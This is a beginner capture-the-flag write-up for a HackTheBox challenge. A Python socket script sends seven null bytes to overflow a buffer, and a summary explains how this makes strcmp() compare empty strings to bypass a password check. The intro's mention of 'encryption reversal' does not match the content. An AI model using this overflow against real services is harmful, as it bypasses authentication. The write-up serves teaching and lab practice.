HackTheBox Writing on the Wall Writeup
Explore the basics of cybersecurity in the Writing on the Wall Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import socket
import sys
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
port = int(port)
input_data = b'\x00' * 7
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
initial_data = s.recv(1024)
print('Received:', initial_data.decode())
s.sendall(input_data)
response = s.recv(1024)
print('Response:', response.decode())
while True:
try:
more_data = s.recv(1024)
if not more_data:
break
print(more_data.decode(), end='')
except:
break
Summary
The Writing on the Wall Challenge on Hack The Box is a very-easy-level challenge that involves exploiting the strcmp() function. The challenge requires bypassing a string comparison by overflowing a buffer. Since strcmp() stops at the null byte (\x00), we can overflow the buffer to overwrite the local_18 variable, which holds the string “w3tpass”. By carefully crafting the input, we can introduce a null byte at the right location, causing strcmp() to compare two empty strings and bypass the comparison. This exploit demonstrates how buffer overflows can be used to manipulate memory and affect program behavior.